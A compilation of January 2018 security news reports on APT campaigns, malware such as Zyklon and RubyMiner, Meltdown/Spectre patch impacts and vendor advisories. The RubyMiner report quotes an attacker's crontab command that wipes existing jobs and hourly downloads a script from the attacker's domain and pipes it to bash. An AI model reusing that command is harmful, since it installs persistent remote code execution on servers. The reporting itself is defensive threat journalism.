The industrial giant has advised customers to always implement the instructions in the “Security Considerations” section of the Triconex documentation. The guide recommends keeping the controllers in locked cabinets and even displaying an alarm whenever they are set to “PROGRAM” mode.

While it’s unclear who is behind the Triton/Trisis attack, researchers agree that the level of sophistication suggests the involvement of a state-sponsored actor. Industrial cybersecurity and threat intelligence firm CyberX believes, based on its analysis of Triton, that the malware was developed by Iran and the targeted organization was in Saudi Arabia.


Russia-Linked Attacks on Political Organizations Continue
19.1.2018 securityweek APT

The cyber-espionage group known as Fancy Bear was highly active in the second half of 2017, hitting political organizations worldwide, Trend Micro said this week.

Also known as APT28, Pawn Storm, Sofacy, Group 74, Sednit, Tsar Team, and Strontium, the group is said to have ties with the Russian government. Since 2015, the group has been associated with attacks on political organizations in France, Germany, Montenegro, Turkey, Ukraine, and the United States.

During the second half of 2017, such attacks continued, without revealing much technical innovation over time. However, the attacks are well prepared, persistent, and often hard to defend against, the security researchers say.

“Pawn Storm has a large toolset full of social engineering tricks, malware and exploits, and therefore doesn’t need much innovation apart from occasionally using their own zero-days and quickly abusing software vulnerabilities shortly after a security patch is released,” Trend Micro points out.

During the second half of 2017, the group was observed targeting organizations with credential phishing and spear phishing attacks. In August and September, the hackers used tabnabbing against Yahoo! users, a method that involves changing a browser tab to point to a phishing site after distracting the target.

In attacks observed in October and November 2017, the group used credential phishing emails to target specific organizations. One incident employed an email claiming to inform the target of an expired password, while the other claimed a new file was present on the company’s OneDrive system.

During the past six months, Pawn Storm also targeted several International Olympic Wintersport Federations, including the European Ice Hockey Federation, the International Ski Federation, the International Biathlon Union, the International Bobsleigh and Skeleton Federation, and the International Luge Federation.

The attacks appear to be related to several Russian Olympic players being banned for life in fall 2017. A recent incident involving the leak of emails exchanged between officials of the International Olympic Committee (IOC) and other individuals involved with the Olympics also appears to be related to the state-sponsored actor.

Some of the group’s political targets included chmail.ir webmail users, who received credential phishing emails on May 18, 2017, one day before the presidential elections in Iran. Similar incidents were observed targeting political organizations globally, Trend Micro says.

In June 2017, the actor set up phishing sites mimicking the ADFS (Active Directory Federation Services) of the U.S. Senate. In attacks observed during fall 2017, the group was abusing Google’s Blogspot service to target Bellingcat, a group of investigative journalists that uses open source information to report on various events taking place around the world.

Individuals interested in the CyCon U.S. conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) in collaboration with the Army Cyber Institute at West Point were also targeted by Pawn Storm last year.

Moving forth, the group is expected to continue targeting political organizations, while also likely focusing on influencing public opinion via social media, given that social media algorithms are “susceptible to abuse by various actors with bad intentions.”

“Publishing stolen data together with spreading fake news and rumors on social media gives malicious actors powerful tools. While a successful influence campaign might seem relatively easy to do, it needs a lot of planning, persistence, and resources to be successful. Some of the basic tools and services, like ones used to spread fake news on social media, are already being offered as a service in the underground economy,” Trend Micro notes.

Other actors too might start campaigns attempting to influence politics and issues of interest domestically and abroad, the researchers say. Pawn Storm, however, is expected to continue to be highly active, especially with the Olympics and several significant global elections taking place in 2018.


Booby-Trapped Messaging Apps Used for Spying: Researchers
19.1.2018 securityweek Mobil
An espionage campaign using malware-infected messaging apps has been stealing smartphone data from activists, soldiers, lawyers, journalists and others in more than 20 countries, researchers said in a report Thursday.

A report authored by digital rights group Electronic Frontier Foundation and mobile security firm Lookout detailed discovery of "a prolific actor" with nation-state capabilities "exploiting targets globally across multiple platforms."

Desktop computers were also targeted, but getting into data-rich mobile devices was a primary objective, according to the report.

With fake versions of secure messaging services like WhatsApp and Signal, the scheme has enabled attackers to take pictures, capture audio, pinpoint locations, and mine handsets for private data.

EFF and Lookout researchers dubbed the threat "Dark Caracal."

People in the US, Canada, Germany, Lebanon, and France have been hit by Dark Caracal, according to EFF director of cybersecurity Eva Galperin.

"This is a very large, global campaign, focused on mobile devices," Galperin said.

"Mobile is the future of spying, because phones are full of so much data about a person's day-to-day life."

Hundreds of gigabytes of data have been taken from thousands of victims in more than 21 countries, according to Lookout and the EFF.

There were indications that Dark Caracal might be an infrastructure hosting a number of widespread, global cyberespionage campaigns, some of which date back years, the report said.

Because the apps fool people into thinking they are legitimate, users give them access to cameras, microphones and data.

"All Dark Caracal needed was application permissions that users themselves granted when they downloaded the apps, not realizing that they contained malware," said EFF staff technologist Cooper Quintin.

"This research shows it's not difficult to create a strategy allowing people and governments spy to on targets around the world."

Researchers reported that they tracked Dark Caracal to a building in Beirut belonging to the Lebanese General Security Directorate.

Analysis showed that devices of military personnel, businesses, journalists, lawyers, educators, and medical professionals have been compromised, according to the report.

"Not only was Dark Caracal able to cast its net wide, it was also able to gain deep insight into each of the victim's lives," the report concluded.

Cyber security professionals consistently warn people to be wary when downloading software, avoiding programs shared through links or email and instead relying on trusted sources.


Cloudflare Launches Remote Access to Replace Corporate VPNs
19.1.2018 securityweek Security
Mobile and cloud computing have challenged the concept of perimeter security. There is no longer an easily definable perimeter to defend. VPNs are a traditional, but not ideal solution. Neither approach addresses the attacker who gets through the perimeter or into the VPN. Google long ago recognized the problems and introduced BeyondCorp as an alternative to perimeters and VPNs for its own worldwide employees.

BeyondCorp replaces the need for VPNs. Instead it focuses on authenticating the device (which it provides and identifies with a device certificate) and its user, and then imposes tiered authentication around its applications. In effect, it removes the distinction between a trusted network and an untrusted network, and focuses on authenticated access from any location.

It is a good security model, but one that is beyond the reach of companies that don't have Google's resources. Now Cloudflare has announced a new service for its customers that it calls Cloudflare Access and describes as 'democratizing' the BeyondCorp model. It allows employees to operate outside of the corporate network without requiring them to use a VPN, "which," writes Cloudflare engineer Venkat Viswanathan in an associated blog post Wednesday, "slows down work because every page load makes extra round trips to the VPN server. After all this hassle, users on the VPN are still highly susceptible to phishing, man-in-the-middle and SQL injection attacks."

"VPNs are slow, and clunky, and frankly, don't make sense for an increasingly mobile workforce accessing increasingly cloudified apps," said Matthew Prince, co-founder and CEO of Cloudflare. "Cloudflare Access gives centralized application access control for legacy or cloud apps without slowing down connections, regardless of where someone is working around the world."

Unlike BeyondCorp, however, Cloudflare cannot provide corporate devices for the users. Customers remain responsible for the security of the remote devices. "We don't insist on clients providing company devices to employees," Prince told SecurityWeek, "but we recommend that they tick some sort of identity provider. That could be Google, Microsoft Active Directory, Okta or something they've built themselves. How much they use that service and lock down the individual devices is up to them, but we would recommend that they use multi-factor authentication on those devices."

Cloudflare's role in this model is to protect the customer's individual applications within separate authentication wrappers. "While perimeter defense is based on the idea of a moat around the castle," said Prince, "this new model puts each application (the castle's individual crown jewels) into separate safes. We don't care whether the customer uses a combination lock safe, or a physical key safe or an electronic keypad safe. We'll support any of the different mechanisms for unlocking the safe -- but what we provide is the safe itself. We provide the thing that wraps around wherever the crown jewels are located and protects them. It is the customers that decide how they want to verify if the device and user are legitimate and authorized to open the door that we provide."

Cloudflare's Access product does not defend the user's device, but it does defend the company's applications. "Even if an attacker manages to get into a device, every access to the company network is logged by Cloudflare. The customer can monitor for anomalies. So, the model of wrapping authentication around each application not only adds friction to any attack, it also provides a central repository where the security team can look for anomalies, track bad behavior and quickly respond accordingly. The customer's administrator for the Cloudflare service would have a single view of every employee's device -- when it logged into and used each of the different services -- on a service by service basis. If anything anomalous happens, the administrator can withdraw the user's Access instantly."

The logs are accessible through a Cloudflare API, so anomaly detection can be automated using anomaly detection tools in-house. "Over time," said Prince, "as Access matures, there will be additional tools that we provide to allow customers to look for things that might be anomalous. For example, if a device has only logged into three services in its entire history, and then suddenly logs into five new services, we would surface that in the logs and show it to the admins. This is not currently available," he added. "You could build it through our APIs, but it's something we are likely to make available in future versions of our product."

Cloudflare's new Access product is a replacement for corporate VPNs using much of Google's BeyondCorp model.

"When a user accesses an individual application," explained Prince, "it would be like passing through a VPN on a per application basis. Users would hit a Cloudflare data center which prompts for proof of identity and authorization to access a particular application. If that authorization proves 'true', then the user gets a fast lane back to the actual application, which could be running anywhere on the internet, whether in-house or a third-party such as Salesforce. The user gets a much faster experience through not having to back haul everything through some centralized VPN server." Like a VPN, all traffic is protected by encryption.

"If you think of the problems that VPNs are trying to solve, they're simply trying to let the good guys in and keep the bad guys out. Access solves that exact same problem, but does it in a way that is more robust. It supports cloud environments, it supports remote workers without slowing down their connection, and it actually provides a better security model where you have individuals being logged as they pass through authentication checkpoints to use each different application."

Cloudflare Access is being sold on a per seat basis: $3 per person, per month. There is no limit to the number of applications that can be accessed by each user via the service. Volume discounts are available for large deployments.

San Francisco, CA-based Cloudflare was founded in 2009. It has raised a total funding amount of $182,050,000 -- the most recent being $110 million Series D funding led by Fidelity Investments in September 2015. It routes traffic through its own global network, blocking DoS attacks, reducing spam and improving performance.


Meltdown and Spectre patches have a variable impact and can cause unwanted reboots, Intel warns
19.1.2018 securityaffairs
Vulnerebility

Intel has published the results of the test conducted on the Meltdown and Spectre patches and their impact on performance confirming serious problems.
According to the tech giant systems with several types of processors running Meltdown and Spectre patches may experience more frequent reboots.

A few days ago Intel reported that extensive test conducted on home and business PCs demonstrated a negligible performance impact on these types of systems (from 2 up to 14%).

Now the vendor has conducted some performance tests on data centers and results show that the impact on the performance depends on the system configuration and the workload.

“As expected, our testing results to date show performance impact that ranges depending on specific workloads and configurations. Generally speaking, the workloads that incorporate a larger number of user/kernel privilege changes and spend a significant amount of time in privileged mode will be more adversely impacted.” reads the analysis conducted by Intel.

Impacts ranging from 0-2% on industry-standard measures of integer and floating point throughput, Linpack, STREAM, server-side Java and energy efficiency benchmarks. The tests are related to benchmarks that cover typical workloads for enterprise and cloud customers.

Intel also evaluated the impact on online transaction processing (OLTP), estimating it at roughly 4%.

Benchmarks for storage demonstrated a strict dependence on the benchmark, test setup, and system configuration.

For FlexibleIO, which simulates various I/O workloads, throughput performance decreased by 18% when the CPU was stressed, but there was no impact when CPU usage was low.

The tests for FlexibleIO were conducted using different benchmark simulating different types of I/O loads, the results depend on many factors, including read/write mix, block size, drives and CPU utilization.

“For FlexibleIO, a benchmark simulating different types of I/O loads, results depend on many factors, including read/write mix, block size, drives and CPU utilization. When we conducted testing to stress the CPU (100% write case), we saw an 18% decrease in throughput performance because there was not CPU utilization headroom.” continues the analysis. “When we used a 70/30 read/write model, we saw a 2% decrease in throughput performance. When CPU utilization was low (100% read case), as is the case with common storage provisioning, we saw an increase in CPU utilization, but no throughput performance impact.”

The most severe degradation of the performance was observed during Storage Performance Development Kit (SPDK) tests, using iSCSI the degradation reached 25% when only a single core was used. Fortunately, there was no degradation of the performance when SPDK vHost was used.

Meltdown%20and%20Spectre%20patches%C2%A0

Intel also reported that Meltdown and Spectre patches are causing more frequent reboots, this behavior was observed for systems running Broadwell, Haswell, Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

“We have reproduced these issues internally and are making progress toward identifying the root cause. In parallel, we will be providing beta microcode to vendors for validation by next week,” said Navin Shenoy, executive vice president and general manager of Intel’s Data Center Group.

Only the newest Intel 8th-gen CPUs Coffee Lake seems to be not affected by reboots.


North Korea Group 123 involved in at least 6 different hacking campaigns in 2017
19.1.2018 securityaffairs APT

North Korean hackers belonging to the North Korea Group 123 have conducted at least six different massive malware campaigns during 2017.
North Korean hackers have conducted at least six different massive malware campaigns during 2017, most of them against targets in South Korea. Security researchers from Cisco’s Talos group who have monitored the situation for 12 months have identified a North Korean threat actor tracked by the experts as Group 123 that conducted numerous malware attacks against entities in the South.

In three differed phishing campaigns tracked as “Golden Time”, “Evil New Year” and “North Korean Human Rights” South Korean victims were specifically infected with the Remote Access Trojan ROKRAT.

“On January 2nd of 2018, the “Evil New Year 2018” was started. This campaign copies the approach of the 2017 “Evil New Year” campaign.

The links between the different campaigns include shared code and compiler artifacts such as PDB (Program DataBase) patterns which were present throughout these campaigns.” reads the analysis published by Talos.

“Based on our analysis, the “Golden Time”, both “Evil New Year” and the “North Korean Human Rights” campaigns specifically targeted South Korean users.”

The ROKRAT RAT was used to target Korean targets using the popular Korean Microsoft Word alternative Hangul Word Processor (HWP). In the past, we saw other attacks against people using the HWP application.

ROKRAT%20RAT

The three campaigns leveraged on a payload in the Hancom Hangul Office Suite, North Korean hackers exploited vulnerabilities such as the CVE-2013-0808 EPS viewer bug to deliver the RAT.

The attackers also used specially crafted files to trigger the arbitrary code execution vulnerability CVE-2017-0199. Group 123 also launched the FreeMilk campaign against financial institutions outside South Korea.

The hackers in this campaign used phishing message with a weaponized Microsoft Office document that was able to trigger the vulnerability CVE-2017-0199.

“Group 123 used this vulnerability less than one month after its public disclosure. During this campaign, the attackers used 2 different malicious binaries: PoohMilk and Freenki.” continues the analysis.”PoohMilk exists only to launch Freenki. Freenki is used to gather information about the infected system and to download a subsequent stage payload. This malware was used in several campaigns in 2016 and has some code overlap with ROKRAT.”

The last campaign analyzed by Talos group was tracked as “Are You Happy,” it is a sabotage campaign that targeted the victims using a module from ROKRAT designed to wipe the first sectors of the victim’s hard drive.

According to Talos, this actor was very active in 2017, and likely will continue its campaigns in the next months, especially against targets in the South.

“The actor has the following demonstrated capabilities:

To include exploits (for Hangul and Microsoft Office) in its workflows.
To modify its campaigns by splitting the payload in to multiple stages
To use compromised web servers or legitimate cloud based platforms.
To use HTTPS communications to make it harder to perform traffic analysis.
To compromise third parties to forge realistic spear phishing campaigns (i.e. Yonsei university in the “Golden Time” campaign).
To constantly evolve, the new fileless capability included in 2018 is a proof.” concluded Talos.
north%20korea%20phishing%20campaigns

The report includes the IoCs for each campaign.


Hackers Exploiting Three Microsoft Office Flaws to Spread Zyklon Malware

18.1.2018 thehackernews Virus

Security researchers have spotted a new malware campaign in the wild that spreads an advanced botnet malware by leveraging at least three recently disclosed vulnerabilities in Microsoft Office.
Dubbed Zyklon, the fully-featured malware has resurfaced after almost two years and primarily found targeting telecommunications, insurance and financial services.
Active since early 2016, Zyklon is an HTTP botnet malware that communicates with its command-and-control servers over Tor anonymising network and allows attackers to remotely steal keylogs, sensitive data, like passwords stored in web browsers and email clients.
Zyklon malware is also capable of executing additional plugins, including secretly using infected systems for DDoS attacks and cryptocurrency mining.
Different versions of the Zyklon malware has previously been found being advertised on a popular underground marketplace for $75 (normal build) and $125 ( Tor-enabled build).
According to a recently published report by FireEye, the attackers behind the campaign are leveraging three following vulnerabilities in Microsoft Office that execute a PowerShell script on the targeted computers to download the final payload from its C&C server.
1) .NET Framework RCE Vulnerability (CVE-2017-8759)—this remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over an email. Microsoft already released a security patch for this flaw in September updates.
2) Microsoft Office RCE Vulnerability (CVE-2017-11882)—it’s a 17-year-old memory corruption flaw that Microsoft patched in November patch update allows a remote attacker to execute malicious code on the targeted systems without requiring any user interaction after opening a malicious document.
3) Dynamic Data Exchange Protocol (DDE Exploit)—this technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to perform code execution on the targeted device without requiring Macros to be enabled or memory corruption.
As explained by the researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrives with an attached ZIP file containing a malicious Office doc file.
Once opened, the malicious doc file equipped with one of these vulnerabilities immediately runs a PowerShell script, which eventually downloads the final payload, i.e., Zyklon HTTP malware, onto the infected computer.
"In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded," the FireEye researchers said.
"The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode."
"The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework."
Interestingly, the PowerShell script connects to a dotless IP address (example: http://3627732942) to download the final payload.
What is Dotless IP Address? If you are unaware, dotless IP addresses, sometimes referred as 'Decimal Address,' are decimal values of IPv4 addresses (represented as dotted-quad notation). Almost all modern web browsers resolve decimal IP address to its equivalent IPV4 address when opened with "http://" following the decimal value.
For example, Google's IP address 216.58.207.206 can also be represented as http://3627732942 in decimal values (Try this online converter).
The best way to protect yourself and your organisation from such malware attacks are always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.
Most importantly, always keep your software and systems up-to-date, as threat actors incorporate recently discovered, but patched, vulnerabilities in popular software—Microsoft Office, in this case—to increase the potential for successful infections.


Threat actors are delivering the Zyklon Malware exploiting three Office vulnerabilities
18.1.2018 securityaffairs 
Vulnerebility

Security experts from FireEye have spotted a new strain of the Zyklon malware that has been delivered by using new vulnerabilities in Microsoft Office.
Researchers at FireEye reported the malware was used in attacks against organizations in the telecommunications, financial, and insurance sectors.

Zyklon has been spotted for the first time in 2016, it is a publicly available malware that could be used for multiple purposes such as espionage campaigns, DDoS attacks or to mine cryptocurrency.

“FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware.” reads the analysis published by FireEye.

“Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal.”

The malware is modular, it can download several plugins to implement different features, it may communicate with C&C server over The Onion Router (Tor) network.

In this last campaign, the malicious code has been delivered via spam emails using as a ZIP archive that contains a specially crafted Word document.

The document exploits one of three vulnerabilities in Microsoft Office to deliver a PowerShell script that downloads the final Zyklon payload from a remote server.

Zyklon malware

One of the flaws exploited by the attackers is CVE-2017-8759, a flaw that was fixed by Microsoft in September 2017 after it was exploited by threat actors such as the Cobalt group to deliver malware in attacks wild.

A second triggered by the documents used in the campaign spotted by FireEye is CVE-2017-11882, a 17-year-old vulnerability in MS Office that could be exploited by remote attackers to install a malware without user interaction.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

This flaw was used by differed APT groups, including the Cobalt group and Iran-linked hackers.

The attackers also exploited the Dynamic Data Exchange (DDE) feature in Office to deliver the malicious code, the same feature was abused by at least one Russian APT group in cyber espionage campaigns and by the powerful Necurs botnet to deliver ransomware.

Once the malware has successfully exploited one of these flaws, it will download a PowerShell script that injects code and fetches the final payload from a remote server.

FireEye highlighted the fact that attackers are exploiting recently discovered flaws in widely adopted software such as the Office suite to increase the likelihood of infecting the victims’ machines.

“Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.” concludes FireEye.

Technical details about the threat, including the Indicators of Compromise, are available in the report published by FireEye.


Internet Systems Consortium rolled out a patch for a BIND security flaw caused DNS Servers Crash
18.1.2018 securityaffairs 
Vulnerebility

The Internet Systems Consortium (ISC) has issued security updates for BIND to address a high severity vulnerability that could cause DNS servers crash.
The Internet Systems Consortium (ISC) has rolled out security updates for BIND to address a high severity vulnerability that could be remotely exploited to crash DNS servers.

The flaw discovered by Jayachandran Palanisamy of Cygate AB and tracked as CVE-2017-3145, is caused by a use-after-free bug that can lead to an assertion failure and crash of the BIND name server (named) process.

“BIND was improperly sequencing cleanup operations on upstream recursion fetch contexts, leading in some cases to a use-after-free error that can trigger an assertion failure and crash in named.” reads the security advisory published by ISC.

According to the ISC there is no evidence that the flaw has been exploited in attacks in the wild, but the ISC states that many crashes caused by the bug have been reported by “multiple parties.”

The issue impacted systems that operate as DNSSEC validating resolvers, the experts suggest to temporarily disable DNSSEC validation as a workaround.

“While this bug has existed in BIND since 9.0.0, there are no known code paths leading to it in ISC releases prior to those containing the fix for CVE-2017-3137. Thus while all instances of BIND ought to be patched, only ISC versions [9.9.9-P8 to 9.9.11, 9.10.4-P8 to 9.10.6, 9.11.0-P5 to 9.11.2, 9.9.9-S10 to 9.9.11-S1, 9.10.5-S1 to 9.10.6-S1, and 9.12.0a1 to 9.12.0rc1] acting as DNSSEC validating resolvers are currently known to crash due to this bug. The known crash is an assertion failure in netaddr.c.” continues the advisory.

The ISC also disclosed a medium severity DHCP flaw tracked as CVE-2017-3144 that affect versions 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, and 4.3.0 to 4.3.6.

“A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. ” reads the ISC advisory.

“By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server. Once exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.,”

ISC has already developed a patch that will be rolled out in the future DHCP releases, as a workaround it is possible to disallow access to the OMAPI control port from unauthorized clients.


Oracle January 2018 Critical Patch Update also addresses Spectre and Meltdown
18.1.2018 securityaffairs 
Vulnerebility

Oracle rolled out the January 2018 Critical Patch Update that includes 237 security fixes in its products, the majority of which is remotely exploitable without authentication.
The January 2018 Critical Patch Update also includes security updates that address Spectre and Meltdown vulnerabilities.

“The January 2018 Critical Patch Update provides fixes for certain Oracle products for the Spectre (CVE-2017-5753, CVE-2017-5715) and Meltdown (CVE-2017-5754) Intel processor vulnerabilities. Please refer to this Advisory and the Addendum to the January 2018 Critical Patch Update Advisory for Spectre and Meltdown MOS note (Doc ID 2347948.1).” reads the advisory published by Oracle. “This Critical Patch Update contains 237 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at January 2018 Critical Patch Update: Executive Summary and Analysis.”

The January 2018 Critical Patch Update contains 13 new security fixes for the Oracle Sun Systems Products Suite that address 7 remotely exploitable issues.

Oracle updates include the fix for the Spectre CVE-2017-5715 vulnerability affecting its Oracle X86 Servers and Oracle VM VirtualBox. The security updates for Oracle X86 Servers include Intel microcode that allows mitigating the issue in OS and VM.

“Application of firmware patches to pick up the Intel microcode is required only for Oracle x86 servers using non Oracle OS and Virtualization software. Oracle OS and Oracle VM patches for CVE-2017-5715 will include updated Intel microcode.” reads a note included in the advisory “Oracle OS and Oracle VM patches for CVE-2017-5715 will include updated Intel microcode,”
The advisory includes the full list of fixes along with affected products, the product with the largest number of fixes is Financial Services Applications (34 patches, 13 of them remotely exploitable without authentication).

The second product for the number of fixes is the Fusion Middleware with 27 fixes (21 of them remotely exploitable without authentication).

The third is MySQL with 25 fixes, 6 of which remotely exploitable.

Let’s close with the most severe issue, the CVE-2018-2611 flaw rated with CVSS score 10 affects Sun ZFS Storage Appliance Kit (AK).


RubyMiner Monero Cryptominer affected 30% of networks worldwide in just 24h
18.1.2018 securityaffairs  Hacking

Security researchers at Check Point have spotted a malware family dubbed RubyMiner that is targeting web servers worldwide in an attempt to exploit their resources to mine Monero cryptocurrency.
RubyMiner, was first spotted last week when a massive campaign targeted web servers worldwide, most of them in the United States, Germany, United Kingdom, Norway, and Sweden.

The experts believe that a single lone attacker is behind the attacks, in just one day he attempted to compromise nearly one-third of networks globally.

“In the last 24 hours, 30% of networks worldwide have experienced compromise attempts by a crypto-miner targeting web servers.” read the analysis from Check Point.

“During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool. Among the top countries targeted are the United States, Germany, United Kingdom, Norway and Sweden, though no country has gone unscathed.”

RubyMiner

The malware targets both Windows and Linux servers, attempting to exploit old vulnerabilities in PHP, Microsoft IIS, and Ruby on Rails to deploy the Monero miner.

The Italian security firm Certego noticed the same attacks that began on January 10.

“Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.” states the report published by Certego.

“The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:”

The attack doesn’t appear very sophisticated, the hacker did not attempt to conceal his operations, but it was focused on infecting the larger number of servers in the shortest time.

“Surprisingly, by using old vulnerabilities published and patched in 2012 and 2013, it doesn’t seem that stealth was part of the attacker’s agenda either. Instead, the attacker chose to exploit multiple vulnerabilities in HTTP web servers, to distribute an open source Monero miner – XMRig.” continues the analysis.

“In fact, XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. However, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit.”

At the time of the report, only 700 servers worldwide have been successfully compromised in the first 24 hours of attacks.

The experts from Certego observed the attacker exploiting the CVE-2013-0156 remote code execution flaw in Ruby on Rails.

The attacker sends a base64 encoded payload inside a POST request in the attempt to trick the interpreter into executing it.

The malicious payload is a bash script that adds a cronjob that runs every hour and downloads a robots.txt file containing a shell script, used to fetch and execute the cryptominer. The scheduler is being told to run the whole process, including downloading the file from the server every hour.

“The cron is a UNIX based scheduler which allows running scheduled tasks at fixed times via its own syntax. Running the crontab command with the –r argument will remove all existing tasks in the existing crontab and allow for the miner to take full priority.” continues the analysis from Checkpoint.

echo “1 * * * * wget -q -O – http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1″|crontab –
“Now the attacker can inject the new job to the clean crontab file using the “1 * * * *” which will tell the scheduler to run once an hour for one minute infinitely.

The new job will download and execute the “robots.txt” file hosted on “internetresearch.is.” and the mining process can begin.”

Experts believe that the robots.txt file could be used also as a kill switch for RubyMiner, modify the robots.txt file on the compromised webserver it is possible to deactivate the malware.

“Within a minute, all the machines re-downloading the file will be receiving files without the crypto miners,” Check Point notes.

The expert noticed that one of the domains used by the attacker, lochjol.com, was involved in an attack that abused the Ruby on Rails vulnerability in 2013.

Check Point researchers also published the IoC related to RubyMiner.


KillaMuvz, the creator of the Cryptex tool family pleads guilty to running malware services
18.1.2018 securityaffairs
Virus

The Briton Goncalo Esteves (24), also known as KillaMuvz, has pleaded guilty to charges related to creating and running malware services.
The Briton Goncalo Esteves (24) has pleaded guilty to charges related to creating and running malware services.

Such kind of platforms allows crooks to improve the development of their malicious codes. The malware created with the Esteves’ malware services would not be detected by antivirus software.

Esteves that was used the moniker ‘KillaMuvz’ is the creator of Cryptex tool commonly used by vxers to encrypt their files in an effort to avoid the detection. The first version of Cryptex was released in October 2011 and was continuously improved.

According to the NCA, Esteves has pleaded guilty to two computer misuse charges and one count of money laundering, the sentence is planned for February 12.

“A cyber criminal has admitted running a product-testing service for hackers following a joint investigation by the National Crime Agency (NCA) and cyber security firm Trend Micro.

Goncalo Esteves, 24, of Cape Close, Colchester, Essex, ran the website reFUD.me, which allowed offenders to test, for a fee, whether their malicious cyber tools could beat anti-virus scanners.” reads the announcement published by the NCA.

“Under the pseudonym KillaMuvz, he also sold custom-made malware-disguising products and offered technical support to users.

He pleaded guilty to two computer misuse offences and a count of money laundering at Blackfriars Crown Court.”

Cryptex Reborn allowed vxers to encrypt the malware files in an effort to make them “Fully UnDetectable” (FUD).

Esteves sold Crypters for use in packages which varied in price according to the length of the licence. A month of Cryptex Lite cost $7.99 ( about £5 at the time of offending) while a lifetime licence for Cryptex Reborn cost $90 (about £60). The man also provided customer support via a dedicated Skype account and accepted payment either in conventional currency, in the cryptocurrency Bitcoin or in Amazon vouchers.

One of Esteves’ services was a website called reFUD.me that was launched in February 2015. It has been observed that the service was used to conduct at least 1.2 million scans.

An investigation conducted by the UK’s National Crime Agency (NCA) with the help of Trend Micro resulted in the arrest of Esteves and a woman.

Law enforcement shut down both service after the arrest, Esteves always denied that the software was created for malicious purposes.

According to the NCA, Esteves has pleaded guilty to two computer misuse charges and one count of money laundering, the sentence is planned for February 12.

“A cyber criminal has admitted running a product-testing service for hackers following a joint investigation by the National Crime Agency (NCA) and cyber security firm Trend Micro.

Goncalo Esteves, 24, of Cape Close, Colchester, Essex, ran the website reFUD.me, which allowed offenders to test, for a fee, whether their malicious cyber tools could beat anti-virus scanners.” reads the announcement published by the NCA.

“Under the pseudonym KillaMuvz, he also sold custom-made malware-disguising products and offered technical support to users.

He pleaded guilty to two computer misuse offences and a count of money laundering at Blackfriars Crown Court.”

Esteves advertised his service on the hackforums.net website, a well-known crime messageboard.

“A free service that offers fast and reliable file scanning to ensure that your files remain fully undetectable to anti-malware software.” reads the ad.

The NCA reported that Esteves made £32,000 from more than 800 Paypal transactions between 2011 and 2015.

There are no other information about the transactions made in Bitcoins and using Amazon vouchers.


Intel Tests Performance Impact of CPU Patches on Data Centers
18.1.2018 securityweek IT
Intel Patches for Meltdown and Spectre Cause More Frequent Reboots

Intel on Wednesday shared information on the performance impact of the Meltdown and Spectre patches on data centers, and the company told customers that systems with several types of processors may experience more frequent reboots after firmware updates are installed.

Performance impact on data centers

Roughly one week ago, Intel informed customers that the mitigations for the recently disclosed CPU flaws should have a negligible performance impact for operations typically conducted on home and business PCs. The company reported seeing performance penalties ranging from 2-14% on these types of systems.

Intel has also conducted some performance tests on data centers and the initial results show that, as expected, impact depends on the type of workload and the configuration of the system.

Tests conducted on Intel Xeon Scalable (Skylake) systems showed that impact on integer and floating point throughput, Linpack, STREAM, server-side Java, and energy efficiency, which are typical for enterprise and cloud customers, was 0-2%.

In the case of online transaction processing (OLTP), Intel saw a performance impact of roughly 4%. The company is in the process of conducting more tests and believes the results will depend on system configuration and other factors.

In the case of FlexibleIO, which simulates various I/O workloads, throughput performance decreased by 18% when the CPU was stressed, but there was no impact when CPU usage was low.

Intel saw the most significant performance penalties during Storage Performance Development Kit (SPDK) tests, specifically using iSCSI, reaching 25% when only a single core was used. However, there was no impact on performance when SPDK vHost was used.

Performance penalties of Intel patches on data centers

Microsoft, AWS, Red Hat and others have also shared information on the impact of the Spectre and Meltdown mitigations on performance.

Performance%20penalties%20of%20Intel%20patches%20on%20data%20centers

Intel has released firmware updates for 90% of the CPUs released in the last five years. While the company claims that the updates are effective at mitigating the Spectre and Meltdown attacks, users have reported seeing more frequent reboots after applying patches.

